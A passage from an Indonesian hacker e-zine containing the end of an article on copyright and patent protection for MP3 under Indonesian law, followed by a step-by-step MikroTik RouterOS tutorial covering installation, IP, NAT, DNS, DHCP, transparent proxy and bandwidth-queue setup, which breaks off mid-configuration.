MP3 dilindungi dengan paten, yaitu dengan adanya software patent. Di
Indonesia, sebuah program komputer bukan merupakan objek paten, hal ini
berdasarkan Penjelasan Atas Undang-undang Tentang Paten yang menyebutkan
sebagai berikut.

Invensi tidak mencakup:
(1) kreasi estetika;
(2) skema;
(3) aturan dan metode untuk melakukan kegiatan:
a. yang melibatkan kegiatan mental,
b. permainan,
c. bisnis;
(4) aturan dan metode mengenai program komputer;  [cetak tebal dari penulis]


Dengan demikian, MP3 bukan merupakan objek perlindungan paten sehingga
tidak bisa dipatenkan di Indonesia. Selanjutnya, perlindungan apa yang
tepat untuk melindungi MP3 secara form-nya sebagai software? Seperti
yang telah diuraikan sebelumnya, perlindungan hukum yang tepat bagi MP3
sebagai software adalah dengan mekanisme hak cipta. Apabila terjadi
pelanggaran hak cipta seperti memperbanyak software MP3 atau
mendistribusikan software tersebut tanpa izin Pencipta atau Pemegang
Lisensi MP3 tersebut dan untuk tujuan komersial dapat diterapkan
ketentuan dalam Pasal 72 ayat (3) UUHC yaitu:


(3)   Barangsiapa dengan sengaja dan tanpa hak memperbanyak penggunaan
untuk kepentingan komersial suatu Program Komputer dipidana
dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda
paling banyak Rp 500.000.000,00 (lima ratus juta rupiah).

Akan tetapi, apabila perbanyakan software MP3 tersebut untuk
tujuan membuat salinan cadangan program MP3 tersebut dan semata-mata untuk
tujuan pribadi, maka perbuatan demikian bukanlah perbuatan yang melanggar
hak cipta, hal ini berdasarkan ketentuan yang tercantum dalam Pasal 15
huruf g UUHC.

Selanjutnya, bagaimana perlindungan hak cipta terhadap substance atau
isi dari MP3? Telah dijelaskan, isi atau konten dari MP3 lazimnya berisi
lagu atau musik. Sebuah lagu atau musik dapat dikategorikan sebagai
karya seni, dan berdasarkan Pasal 12 ayat (1) huruf d sebagai berikut.

Pasal  12

(1) Dalam Undang-undang ini Ciptaan yang dilindungi adalah Ciptaan
dalam bidang ilmu pengetahuan, seni, dan sastra, yang mencakup:
a. ...
b. ...
c. ...
d. lagu atau musik dengan atau tanpa teks;


MP3 yang banyak beredar di Indonesia memiliki konten lagu-lagu atau
musik bajakan berasal dari CD orisinal yang di-ripping  kemudian
dikompilasi menjadi satu CD yang berisi data MP3 yang memiliki konten
musin atau lagu digital. Dalam proses ini terjadi pengalihwujudan
karya seni dari analog menjadi digital, pengalihwujudan lagu atau
musik analog menjadi digital menyebabkan semakin mudahnya proses
penyalinan musik atau lagu digital dari satu media ke media lainnya.
Pengalihwujudan suatu karya cipta untuk tujuan komersil yang
dilindungi oleh hak cipta harus berdasarkan izin dari Pencipta atau
Pemegang Hak Cipta, sehingga apabila proses pengalihwujudan lagu atau
musik menjadi lagu atau musik digital tanpa seizin dari Pencipta atau
Pemegang Hak Cipta, hasil konversi tersebut dianggap telah melanggar
hak cipta, hal ini disebabkan, proses pengalihwujudan atau konversi
dari suatu karya cipta sudah merupakan proses perbanyakan dari karya
cipta itu sendiri. Berdasarkan Pasal 2 ayat (1) UUHC dikatakan sebagai
berikut.

Hak Cipta merupakan hak eksklusif bagi Pencipta atau Pemegang Hak
Cipta untuk mengumumkan atau memperbanyak Ciptaannya, yang timbul
secara otomatis setelah suatu ciptaan dilahirkan tanpa mengurangi
pembatasan menurut peraturan perundang-undangan yang berlaku.


Dengan demikian, apabila pengalihwujudan yang menyebabkan adanya
perbanyakan terhadap suatu ciptaan tanpa izin dari pencipta atau
pemegang hak cipta, tindakan tersebut dapat memenuhi unsur tindak
pidana sebagaimana diatur dalam Pasal 72 ayat (1) UUHC yaitu sebagai
berikut.

Barangsiapa dengan sengaja dan tanpa hak melakukan perbuatan sebagai
mana dimaksud dalam Pasal 2 ayat (1) atau Pasal 49 ayat (1) dan ayat (2)
dipidana dengan pidana penjara  masing-masing paling singkat 1 (satu)
bulan dan/atau denda paling sedikit Rp 1.000.000,00 (satu juta rupiah),
atau pidana penjara paling lama 7 (tujuh) tahun dan/atau denda paling
banyak Rp 5.000.000.000,00 (lima miliar rupiah).


Berdasarkan uraian sebelumnya, dapat disimpulkan, di Indonesia,
meskipun MP3 tidak bisa dilindungi dengan Hak Paten, MP3 baik secara
form maupun secara substansinya telah mendapat perlindungan hukum
yaitu dengan adanya perlindungan terhadap hak cipta dari ciptaan MP3
tersebut. Permasalahan terkait MP3 illegal di Indonesia yang lebih
banyak terjadi adalah pengalihwujudan musik dan lagu yang menyebabkan
terjadinya perbanyakan ciptaan tanpa seizin pencipta atau pemegang
hak cipta. Sedangkan permasalahan hak cipta terkain form dari software
MP3 itu sendiri tidak banyak terjadi, hal ini antara lain disebabkan
software MP3 memang dilisensikan sebagai free software yang artinya
diperbolehkan untuk didistribusikan atau di salinkan secara gratis.
Salah satu solusi untuk menekan laju peredaran MP3 illegal selain
penegakan hukum adalah menyediakan MP3 legal dengan harga bersaing.
Harga yang bersaing didapat karena penjualan MP3 legal secara online
dapat memangkas jalur distrbusi. Perusahaan rekaman di Indonesia dapat
meniru mekanisme penjualan MP3 yang telah dilakukan oleh iTuns, AllOfMP3,
Tunster, dan lainnya. Diharapkan dengan adanya MP3 legal dengan harga
bersaing, pebajakan di Indonesia dapat direduksi seminimal mungkin.


Zka 
-----------------------------------------------------------------------
Copyleft Unreserved by Law 1995 - 2007 Kecoak Elektronik Indonesia
http://www.kecoak-elektronik.net

Instalasi, Konfigurasi dan Optimasi Mikrotik RouterOS

2007-06-19T13:28:00.000+07:00

####################################################################
TOKET - Terbitan Online Kecoak Elektronik
Defending the classical hackers mind since 1995

Publisher : http://www.kecoak-elektronik.net
Contact   : staff@kecoak-elektronik.net
####################################################################

Subject   : Instalasi, Konfigurasi dan Optimasi Mikrotik RouterOS
Writer    : r0t0r of Kecoak Elektronik
Contact   : rotor@kecoak-elektronik.net
Style     : Unicode Transformation Format (UTF-8)


--[1]-- Kecoak Elektronik License

Kecoak Elektronik secara aktif mendukung Blue Ribbon Campaign.
Kami akan berusaha untuk menerbitkan semua informasi yang kami anggap
patut diketahui, baik dokumen teks, artikel majalah, atau surat kabar.
Seluruh kredit akan diberikan kepada sang pengarang.

Kecoak Elektronik tidak bertanggung jawab atas tindakan orang lain.
Informasi yang disajikan di situs ini adalah untuk tujuan pendidikan
dan informasionil belaka. Jika Anda memutuskan untuk mengejawantahkan
dalam bentuk apapun informasi yang tersimpan di situs ini, Anda
melakukan atas keputusan sendiri, dan tidak seorangpun selain Anda
bertanggung jawab atas tindakan tersebut.

Dipersilahkan untuk mengambil sebagian atau seluruh dari isi artikel
yang kami terbitkan dengan tetap mencantumkan kredit atas pengarang
dan Kecoak Elektronik sebagai penerbit online. Artikel yang dikutip
atau diambil tidak dapat dipergunakan untuk kepentingan komersil.


--[2]-- Intro

MikroTik RouterOS™, merupakan system operasi Linux base yang diperuntuk
kan sebagai network router. Didesain untuk memberikan kemudahan bagi
penggunanya. Administrasinya bisa dilakukan melalui Windows application
(WinBox). Webbrowser serta via Remote Shell (telnet dan SSH). Selain
itu instalasi dapat dilakukan pada Standard computer PC. PC yang akan
dijadi kan router mikrotikpun tidak memerlukan resource yang cukup besar
untuk penggunaan standard, misalnya hanya sebagai gateway. Untuk keperluan
beban yang besar ( network yang kompleks, routing yang rumit dll)
disarankan untuk mempertimbangkan pemilihan resource PC yang memadai.

Fasilitas pada mikrotik antara lain sebagai berikut :
- Protokoll routing RIP, OSPF, BGP.
- Statefull firewall
- HotSpot for Plug-and-Play access
- remote winbox GUI admin

Lebih lengkap bisa dilihat di www.mikrotik.com.

Meskipun demikian Mikrotik bukanlah free software, artinya kita harus
membeli licensi terhadap segala fasiltas yang disediakan. Free trial
hanya untuk 24 jam saja. Kita bisa membeli software mikrotik dalam
bentuk CD yang diinstall pada Hard disk atau disk on module (DOM).
Jika kita membeli DOM tidak perlu install tetapi tinggal menancapkan
DOM pada slot IDE PC kita.

Instalasi Mikrotik ada beberapa cara :
1. Instalasi melalui NetInstall via jaringan
2. Instalasi melalui Floppy disk
3. Instalasi melalui CD-ROM.

Kali ini kita akan membahasnya instalasi melalui CD-ROM. Untuk percobaan
ini silahkan download ISOnya di http://adminpreman.web.id/download

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang
dikonfigurasikan untuk jaringan sederhana sebagai PC Router/Gateway,
Web Proxy, DNS Server, DHCP, Firewall serta Bandwidth Management.
Konfigurasi ini dapat dimanfaatkan untuk membangun jaringan pada
Internet Cafe atau untuk Testing pada Laboratorium Pribadi.

--[2.1]-- Topologi Jaringan

Topologi jaringan ini di anggap koneksi Internetnya melalui MODEM
xDSL (ADSL atau SDSL). Dengan catatan konfigurasi IP Publiknya
ditanam didalam MODEM, artinya perlu pula dipilih MODEM yang memiliki
fasilitas seperti Routing, Firewall, dan lain-lain. Semakin lengkap
semakin bagus, namun biasanya harga semakin mahal, yang patut
dipertimbangkan pilihlah MODEM yang memiliki fasilitas Firewall yang
bagus.

Untuk MODEM SDSL, biasanya, IP dibawah NAT, artinya IP nya bukan IP
Publik langsung. Dan umumnya untuk MODEM ADSL, IP Publiknya langsung
ditanam di MODEM itu sendiri.

Saat ini kita anggap IP Publiknya di tanam di MODEM, dimana Interface
PPPoE nya sudah di konfigurasikan dan sudah bisa DIAL ke server RASnya.

Agar memudahkan konfigurasi, perlu dirancang topologi jaringan yang
dikonfigurasi. Sebagai contoh, skema dibawah ini:


(a) Skema Jaringan

            _(
o--+      ____| 
 |     /    |  Telpon
 |   _/     -(
 +--[_] Splitter
     |
     |   +----+
     +---|    | Modem xDSL
         +--*-+
         (1)|             +---+
            |             |   |   (3)
            |             |  +|---------+ 
            |   +-----+   |  |. . . . . |
            |  a|     |   |  +--|-|-|-|-+
            +---|=====|   |     | | | |
                |     |   |     | | | |
                |     |---+     +-|-|-|--[client 1]
                |     |b          +-|-|------------[client 2]
                |     |             +-|----------------------[client 3]
                L-----J               +--------[client n]
                  (2)


Keterangan skema
(1) = Modem xDSL (Ip Address : 192.168.1.1/24)
(2) = Mikrotik Box dengan 2 ethernet card yaitu a (publik) dan b (local)
(3) = Switch
    Untuk sambungan ke Client. Asumsi Client Jumlahnya 20 Client
    Range Ip Address : 192.168.0.0/27
    Alokasi Ip Client = 192.168.0.1-192.168.0.30
                        Ip Net ID    : 192.168.0.0/27
                        Ip Broadcast : 192.168.0.31/27

             
(b) Alokasi IP Address

[*] Mikrotik Box

  Keterangan Skema
  a = ethernet card 1 (Publik) -> Ip Address : 192.168.1.2/24
  b = ethernet card 2 (Local)  -> Ip Address : 192.168.0.30/27

  Gateway    : 192.168.1.1 (ke Modem)

[*] Client 
  Client 1 - Client n, Ip Address : 192.168.0.n .... n (1-30)

  Contoh:
  Client 6
  Ip Address : 192.168.0.6/27
  Gateway    : 192.168.0.30 (ke Mikrotik Box)
  

CATATAN :
Angka dibelakang Ip address ( /27) sama dengan nilai netmasknya
untuk angka (/27) nilainya sama dengan 255.255.255.224.

Untuk Sub Netmask blok ip address Local kelas C, dapat diuraikan
sebagai berikut :

Subnetmask kelas C
-------------------
255.255.255.0   = 24 -> 254 mesin
   ..    .128 = 25 -> 128 mesin
   ..    .192 = 26 ->  64 mesin
   ..    .224 = 27 ->  32 mesin
   ..    .240 = 28 ->  16 mesin
   ..    .248 = 29 ->   8 mesin
   ..    .252 = 30 ->   4 mesin
   ..    .254 = 31 ->   2 mesin
   ..    .255 = 32 ->   1 mesin

--[2.2]-- Persiapan

- Untuk PC Router Siapkan PC, minimal Pentium I, RAM 64, HD 500M
atau pake flash memory 64 - Sebagai Web proxy, Siapkan PC, minimal
Pentium III 450Mhz, RAM 256 Mb, HD 20 Gb.  Melihat berapa minimum
RAM dan HD yang dibutuhkan untuk Cache Silahkan lihat
http://adminpreman.web.id/download/Rumus%20Web%20Proxy%20Mikrotik.xls

- Siapkan minimal 2 ethernet card, 1 ke arah luar/Internet dan 1
lagi ke Network local
– Burn Source CD Mikrotik OS masukan ke CDROM.
- Versi mikrotik yang digunakan adalah Mikrotik RouterOS versi 2.9.27


--[3]-- Installasi Mikrotik Router
Setelah desain skema jaringan serta perangkat yang dibutuhkan telah
disiapkan, sekarang saatnya kita mulai proses instalasi ini.

--[3.1]-- Booting melalui CD-ROM

 Atur di BIOS agar, supaya boot lewat CD-ROM, kemudian tunggu beberapa
 saat di monitor akan muncul proses Instalasi.

-------------------------------------------------------------------------

ISOLINUX 2.08 2003-12-12 Copyrigth (C) 1994-2003 H. Peter Anvin
Loading linux..................
Loading initrd.rgz.............
Ready
Uncompressing Linux... Ok, booting the kernel

------------------------------------------------------------------------

--[3.2]-- Memilih paket software

 Setelah proses booting akan muncul menu pilihan software yang
 mau di install, pilih sesuai kebutuhan yang akan direncanakan.

 Paket yang tersedia di Mikrotik

 advanced-tools-2.9.27.npk
 arlan-2.9.27.npk
 dhcp-2.9.27.npk
 gps-2.9.27.npk
 hotspot-2.9.27.npk
 hotspot-fix-2.9.27.npk
 isdn-2.9.27.npk
 lcd-2.9.27.npk
 ntp-2.9.27.npk
 ppp-2.9.27.npk
 radiolan-2.9.27.npk
 routerboard-2.9.27.npk
 routing-2.9.27.npk
 routing-test-2.9.27.npk
 rstp-bridge-test-2.9.27.npk
 security-2.9.27.npk
 synchronous-2.9.27.npk
 system-2.9.27.npk
 telephony-2.9.27.npk
 ups-2.9.27.npk
 user-manager-2.9.27.npk
 web-proxy-2.9.27.npk
 webproxy-test-2.9.27.npk
 wireless-2.9.27.npk
 wireless-legacy-2.9.27.npk


--------------------------------------------------------------------------

      Welcome to Mikrotik Router Software Installation

Move around menu using 'p' and 'n' or arrow keys, select with 'spacebar'.
Select all with 'a', minimum with 'm'. Press 'i' to install locally or 'r' to
install remote router or 'q' to cancel and reboot.

[X] system             [ ] lcd                 [ ] telephony
[ ] ppp                [ ] ntp                 [ ] ups
[ ] dhcp               [ ] radiolan            [ ] user-manager
[X] andvanced-tools    [ ] routerboard         [X] web-proxy
[ ] arlan              [ ] routing             [ ] webproxy-test
[ ] gps                [ ] routing-test        [ ] wireless
[ ] hotspot            [ ] rstp-bridge-test    [ ] wireless-legacy
[ ] hotspot            [X] security         
[ ] isdn               [ ] synchronous

--------------------------------------------------------------------------

Umumnya Paket Mikrotik untuk Warnet, Kantor atau SOHO adalah :

a. SYSTEM           : Paket ini merupakan paket dasar, berisi Kernel dari
                    Mikrotik

b. DHCP             : Paket yang berisi fasilitas sebagai DHCP Server, DHCP
                    client, pastikan memilih paket ini jika Anda menginginkan
                    agar Client diberikan IP address otomatis dari DHCP Server
 
c. SECURITY         : Paket ini berisikan fasilitas yang mengutamakan Keamanan
                    jaringan, seperti Remote Mesin dengan SSH, Remote via MAC
                    Address

d. WEB-PROXY        : Jika Anda memilih paket ini, maka Mikrotik Box anda telah
                    dapat menjalan service sebagai Web proxy yang akan menyimpan
                    cache agar traffik ke Internet dapat di reduksi serta browsing
                    untuk Web dapat dipercepat.

e. ADVANCED TOOLS   : Paket yang berisi Tool didalam melakukan Admnistrasi jaringan,
                    seperti Bandwidth meter, Scanning, Nslookup, dan lain sebagainya.


--[3.3]-- Instalasi Paket

ketik "i" setelah selesai memilih software, lalu akan muncul menu
 pilihan seperti ini :

 - Do you want to keep old configuration ? [y/n] ketik Y
 - continue ? [y/n] ketik Y

 Setelah itu proses installasi system dimulai, disini kita tidak
 perlu membuat partisi hardsik karena secara otomatis mikrotik akan
 membuat partisi sendiri.

----------------------------------------------------------------------------

wireless-legacy (depens on system):
Provides support for Cisco Aironet cards and for PrismlI and Atheros wireless
station and AP.

Do you want to keep old configuraion? [y/n]:y

Warning: all data on the disk will be erased!

Continue? [y/n]:y

Creating partition..........
Formatting disk.......................................

Installing system-2.9.27 [##################                ]

---------------------------------------------------------------------------


Proses installasi

---------------------------------------------------------------------------

Continue? [y/n]:y

Creating partition.......................
Formatting disk............................

Installed system-2.9.27
Installed advanced-tools-2.9.27
Installed dhcp-2.9.27
Installed security-2.9.27
installed web-proxy-2.9.27

Software installed.
Press ENTER to reboot

------------------------------------------------------------------------------

CATATAN :
Proses Installasi normalnya tidak sampai 15 menit, jika lebih berarti gagal,ulangi
ke step awal. Setelah proses installasi selesai maka kita akan diminta untuk
merestart system, tekan enter untuk merestart system.

--[3.5]-- Proses Check system disk

Setelah komputer booting kembali ke system mikrotik, akan ada pilihan untuk
melakukan check system disk, tekan "y".

----------------------------------------------------------------------------
Loading system with initrd
Uncompressing Linux... Ok, booting the kernel.
Starting.

It is recomended to check your disk drive for error,
but it may take while (~1min for 1Gb).
It can be done later with "/system check-disk".
Do you want to do it now? [y/n]
-----------------------------------------------------------------------------

--[3.6]-- Proses Instalasi Selesai

Setelah proses instalasi selesai, maka akan muncul menu login dalam modus
terminal, kondisi sistem saat ini dalam keadaan default.

 Mikrotik login = admin
 Password = (kosong, enter saja)

---------------------------------------------------------------------------
Mikrotik 2.9.27
Mikrotik Login:




MMM      MMM       KKK                          TTTTTTTTTTT      KKK
MMMM    MMMM       KKK                          TTTTTTTTTTT      KKK
MMM MMMM MMM  III  KKK  KKK  RRRRRR     OOOOOO      TTT     III  KKK  KKK
MMM  MM  MMM  III  KKKKK     RRR  RRR  OOO  OOO     TTT     III  KKKKK
MMM      MMM  III  KKK KKK   RRRRRR    OOO  OOO     TTT     III  KKK KKK
MMM      MMM  III  KKK  KKK  RRR  RRR   OOOOOO      TTT     III  KKK  KKK

MikroTik RouterOS 2.9.27 (c) 1999-2005       http://www.mikrotik.com/









Terminal vt102 detected, using multiline input mode
[admin@Mikrotikl] >

----------------------------------------------------------------------------

CATATAN :
Konfigurasi Standar untuk mikrotik ada 2 modus, yaitu modus teks dan
modus GUI. Modus Gui ada 2 juga, yaitu Via Browser serta Via Winbox.
Untuk sekarang saya akan bahas via Teks. Karena cepat serta lebih memahami
terhadap sistem operasi ini.


--[4]-- Perintah Dasar

Perintah mikrotik sebenarnya hampir sama dengan perintah yang ada dilinux,
sebab pada dasarnya mikrotik ini merupakan kernel Linux, hasil pengolahan
kembali Linux dari Distribusi Debian. Pemakaian perintah shellnya sama,
seperti penghematan perintah, cukup menggunakan tombol TAB di keyboard
maka perintah yang panjang, tidak perlu lagi diketikkan, hanya ketikkan
awal nama perintahnya, nanti secara otomatis Shell akan menampilkan sendiri
perintah yang berkenaan. Misalnya perintah IP ADDRESS di mikrotik. Cukup
hanya mengetikkan IP ADD spasi tekan tombol TAB, maka otomatis shell
akan mengenali dan menterjemahkan sebagai perintah IP ADDRESS.

Baiklah kita lanjutkan pengenalan perintah ini.

Setelah login, cek kondisi interface atau ethernet card.

--[4.1]-- Melihat kondisi interface pada Mikrotik Router

[admin@Mikrotik] > interface print
 Flags: X - disabled, D - dynamic, R - running
#    NAME                         TYPE             RX-RATE    TX-RATE    MTU
0  R ether1                        ether            0          0          1500
1  R ether2                       ether            0          0          1500

[admin@Mikrotik]>

Jika interfacenya ada tanda X (disabled) setelah nomor (0,1), maka periksa lagi
etherned cardnya, seharusnya R (running).

a. Mengganti nama interface
 [admin@Mikrotik] > interface(enter)

b. Untuk mengganti nama Interface ether1 menjadi Public (atau terserah namanya), maka 
 [admin@Mikrotik] interface> set 0 name=Public

c. Begitu juga untuk ether2, misalkan namanya diganti menjadi Local, maka
 [admin@Mikrotik] interface> set 1 name=Local

d. atau langsung saja dari posisi root direktori, memakai tanda "/", tanpa tanda kutip
 [admin@Mikrotik] > /interface set 0 name=Public

e. Cek lagi apakah nama interface sudah diganti.
 [admin@Mikrotik] > /interface print

 Flags: X - disabled, D - dynamic, R - running
 #    NAME                         TYPE             RX-RATE    TX-RATE    MTU
 0  R Local                        ether            0          0          1500
 1  R Public                       ether            0          0          1500



--[4.2]-- Mengganti password default
Untuk keamanan ganti password default
  [admin@Mikrotik] > password
  old password: *****
  new password: *****
  retype new password: *****
  [admin@ Mikrotik]]>

--[4.3]-- Mengganti nama hostname
Mengganti nama Mikrotik Router untuk memudahkan konfigurasi, pada langkah ini
  nama server akan diganti menjadi “routerku"

  [admin@Mikrotik] > system identity set name=routerku
  [admin@routerku]>


--[5]-- Setting IP Address, Gateway, Masqureade dan Name Server

--[5.1]-- IP Address

Bentuk Perintah konfigurasi

  ip address add address ={ip address/netmask} interface={nama interface}

a. Memberikan IP address pada interface Mikrotik. Misalkan Public akan kita gunakan untuk
 koneksi ke Internet dengan IP 192.168.1.2 dan Local akan kita gunakan untuk network LAN
 kita dengan IP 192.168.0.30 (Lihat topologi)

  [admin@routerku] > ip address add address=192.168.1.2 \
  netmask=255.255.255.0 interface=Public comment="IP ke Internet"

  [admin@routerku] > ip address add address=192.168.0.30 \
  netmask=255.255.255.224 interface=Local comment = "IP ke LAN"

b. Melihat konfigurasi IP address yang sudah kita berikan

  [admin@routerku] >ip address print
  Flags: X - disabled, I - invalid, D - dynamic
  #   ADDRESS            NETWORK         BROADCAST       INTERFACE
  0   ;;; IP Address ke Internet
      192.168.0.30/27   192.168.0.0    192.168.0.31      Local  
  1   ;;; IP Address ke LAN
      192.168.1.2/24    192.168.0.0    192.168.1.255     Public 
  [admin@routerku]>


--[5.2]-- Gateway

Bentuk Perintah Konfigurasi

   ip route add gateway={ip gateway}
    
a. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah
 192.168.1.1

 [admin@routerku] > /ip route add gateway=192.168.1.1

b. Melihat Tabel routing pada Mikrotik Routers

 [admin@routerku] > ip route print

  Flags: X - disabled, A - active, D - dynamic,
  C - connect, S - static, r - rip, b - bgp, o - ospf
  #     DST-ADDRESS     PREFSRC       G GATEWAY        DISTANCE   INTERFACE
  0 ADC 192.168.0.0/24   192.168.0.30                             Local
  1 ADC 192.168.0.0/27  192.168.1.2                               Public
  2 A S 0.0.0.0/0                     r 192.168.1.1               Public
  [admin@routerku]>

c. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar

  [admin@routerku] > ping 192.168.1.1
  192.168.1.1  64 byte ping: ttl=64 time<1 ttl="64" max =" 0/0.0/0">

--[5.3]-- NAT (Network Address Translation)

Bentuk Perintah Konfigurasi

 ip firewall nat add chain=srcnat action=masquerade out-inteface={ethernet
 yang langsung terhubung ke Internet atau Public}

a. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar
 client computer pada network dapat terkoneksi ke internet perlu kita masquerading.

  [admin@routerku] > ip firewall nat add chain=scrnat out-interface=Public action=masquerade
  [admin@routerku]>

b. Melihat konfigurasi Masquerading

  [admin@routerku] ip firewall nat print
  Flags: X - disabled, I - invalid, D - dynamic
  0   chain=srcnat out-interface=Public action=masquerade
  [admin@routerku]>

--[5.4] Name server

Bentuk Perintah Konfigurasi

    ip dns set primary-dns={dns utama} secondary-dns={dns ke dua}


a. Setup DNS pada Mikrotik Routers, misalkan DNS dengan Ip Addressnya
  Primary = 202.134.0.155, Secondary = 202.134.2.5


  [admin@routerku] > ip dns set primary-dns=202.134.0.155 allow-remoterequests=yes
  [admin@routerku] > ip dns set secondary-dns=202.134.2.5 allow-remoterequests=yes

b. Melihat konfigurasi DNS

  [admin@routerku] > ip dns print
  primary-dns: 202.134.0.155
  secondary-dns: 202.134.2.5
  allow-remote-requests: no
  cache-size: 2048KiB
  cache-max-ttl: 1w
  cache-used: 16KiB

  [admin@routerku]>

c. Tes untuk akses domain, misalnya dengan ping nama domain

  [admin@routerku] > ping yahoo.com
  216.109.112.135 64 byte ping: ttl=48 time=250 ms
  10 packets transmitted, 10 packets received, 0% packet loss
  round-trip min/avg/max = 571/571.0/571 ms
  [admin@routerku]>

Jika sudah berhasil reply berarti seting DNS sudah benar.

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika
berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway
server. Setelah terkoneksi dengan jaringan Mikrotik dapat dimanage menggunakan WinBox yang
bisa di download dari Mikrotik.com atau dari server mikrotik kita. Misal Ip address server
mikrotik kita 192.168.0.30, via browser buka http://192.168.0.30. Di Browser akan ditampilkan
dalam bentuk web dengan beberapa menu, cari tulisan Download dan download WinBox dari situ.
Simpan di local harddisk. Jalankan Winbox, masukkan Ip address, username dan password.


--[7]-- DHCP Server

DHCP merupakan singkatan dari Dynamic Host Configuration Protocol, yaitu suatu program yang
memungkinkan pengaturan IP Address di dalam sebuah jaringan dilakukan terpusat di server,
sehingga PC Client tidak perlu melakukan konfigurasi IP Addres. DHCP memudahkan administrator
untuk melakukan pengalamatan ip address untuk client.

Bentuk perintah konfigurasi

ip dhcp-server setup
dhcp server interface = { interface yang digunakan }
dhcp server space = { network yang akan di dhcp }
gateway for dhcp network = { ip gateway }
address to give out = { range ip address }
dns servers = { name server }
lease time = { waktu sewa yang diberikan }


Jika kita menginginkan client mendapatkan IP address secara otomatis maka perlu kita setup
dhcp server pada Mikrotik. Berikut langkah-langkahnya :

a. Tambahkan IP address pool

  /ip pool add name=dhcp-pool ranges=192.168.0.1-192.168.0.30

b. Tambahkan DHCP Network dan gatewaynya yang akan didistribusikan ke client.
 Pada contoh ini networknya adalah 192.168.0.0/27 dan gatewaynya 122.168.0.30

  /ip dhcp-server network add address=192.168.0.0/27 gateway=192.168.0.30 dns-server=192.168.0.30 \
  comment=""

c. Tambahkan DHCP Server ( pada contoh ini dhcp diterapkan pada interface Local )

  /ip dhcp-server add interface=local address-pool=dhcp-pool

d. Lihat status DHCP server

  [admin@routerku] > ip dhcp-server print

  Flags: X - disabled, I - invalid

  # NAME INTERFACE RELAY ADDRESS-POOL LEASE-TIME ADD-ARP

  0dhcp1 Local

Tanda X menyatakan bahwa DHCP server belum enable maka perlu dienablekan terlebih
dahulu pada langkah e.

e. Jangan Lupa dibuat enable dulu dhcp servernya

  /ip dhcp-server enable 0

kemudian cek kembali dhcp-server seperti langkah 4, jika tanda X sudah tidak ada berarti
sudah aktif

f. Tes Dari client

Misalnya :
D:\>ping www.yahoo.com

--[8]-- Transparent Proxy Server

Proxy server merupakan program yang dapat mempercepat akses ke suatu web
yang sudah diakses oleh komputer lain, karena sudah di simpan didalam
caching server.Transparent proxy menguntungkan dalam management client,
karena system administrator tidak perlu lagi melakukan setup proxy di
setiap browser komputer client karena redirection dilakukan otomatis di sisi
server.

Bentuk perintah konfigurasi :
a. Setting web proxy :

- ip proxy set enable=yes
port={ port yang mau digunakan }
maximal-client-connections=1000
maximal-server-connections=1000

- ip proxy direct add src-address={ network yang akan di
NAT} action=allow

- ip web-proxy set parent-proxy={proxy parent/optional}
hostname={ nama host untuk proxy/optional}
port={port yang mau digunakan}
src-address={ address yang akan digunakan untuk koneksi
              ke parent proxy/default 0.0.0.0}
transparent-proxy=yes
max-object-size={ ukuran maximal file yang akan disimpan
sebagai cache/default 4096 in Kilobytes}
max-cache-size= { ukuran maximal hardisk yang akan
                  dipakai sebagai penyimpan file cache/unlimited
                  | none | 12 in megabytes}
cache-administrator={ email administrator yang akan digunakan
                      apabila proxy error, status akan dikirim
                      ke email tersebut}
enable==yes


Contoh konfigurasi
-------------------

a. Web proxy setting

/ ip web-proxy
set enabled=yes src-address=0.0.0.0 port=8080 \
  hostname="proxy.routerku.co.id" transparent-proxy=yes \
  parent-proxy=0.0.0.0:0 cache-administrator="support@routerku.co.id" \
  max-object-size=131072KiB cache-drive=system max-cache-size=unlimited \
  max-ram-cache-size=unlimited

Nat Redirect, perlu ditambahkan yaitu rule REDIRECTING untuk membelokkan
traffic HTTP menuju ke WEB-PROXY.

b. Setting firewall untuk Transparant Proxy

 Bentuk perintah konfigurasi :

 ip firewall nat add chain=dstnat
 protocol=tcp
 dst-port=80
 action=redirect
 to-ports={ port proxy }

Perintahnya:

--------------------------------------------------------------------------------
/ ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080 \
  comment="" disabled=no
add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080 \
  comment="" disabled=no
add chain=dstnat protocol=tcp dst-port=8000 action=redirect to-ports=8080 \
--------------------------------------------------------------------------------

perintah diatas dimaksudkan, agar semua trafik yang menuju Port 80,3128,8000
dibelokkan menuju port 8080 yaitu portnya Web-Proxy.

CATATAN:
Perintah

/ip web-proxy print { untuk melihat hasil konfigurasi web-proxy}
/ip web-proxy monitor { untuk monitoring kerja web-proxy}


--[9]-- Bandwidth Management

QoS memegang peranan sangat penting dalam hal memberikan pelayanan
yang baik pada client. Untuk itu kita memerlukan bandwidth management
untuk mengatur tiap data yang lewat, sehingga pembagian bandwidth menjadi
adil. Dalam hal ini Mikrotik RouterOs juga menyertakan packet software
untuk memanagement bandwidth.

Bentuk perintah konfigurasi:

queue simple add name={ nama }
target-addresses={ ip address yang dituju }
interface={ interface yang digunakan untuk melewati data }
max-limit={ out/in }

Dibawah ini terdapat konfigurasi Trafik shaping atau bandwidth management
dengan metode Simple Queue, sesuai namanya, Jenis Queue ini memang
sederhana, namun memiliki kelemahan, kadangkala terjadi kebocoran bandwidth
atau bandwidthnya tidak secara real di monitor. Pemakaian untuk 10 Client,
Queue jenis ini tidak masalah.

Diasumsikan Client ada sebanyak 15 client, dan masing-masing client diberi
jatah bandwidth minimum sebanyak 8kbps, dan maksimum 48kbps. Sedangkan
Bandwidth totalnya sebanyak 192kbps. Untuk upstream tidak diberi rule,
berarti masing-masing client dapat menggunakan bandwidth uptream secara
maksimum. Perhatikan perintah priority, range priority di Mikrotik sebanyak
delapan. Berarti dari 1 sampai 8, priority 1 adalah priority tertinggi,
sedangkan priority 8 merupakan priority terendah.

Berikut Contoh kongirufasinya.
--------------------------------------------------------------------------------
/ queue simple
add name="trafikshaping" target-addresses=192.168.0.0/27 dst-address=0.0.0.0/0 \
  interface=all parent=none priority=1 queue=default/default \
  limit-at=0/64000 max-limit=0/192000 total-queue=default disabled=no
add name="01" target-addresses=192.168.0.1/32 dst-address=0.0.0.0/0 \
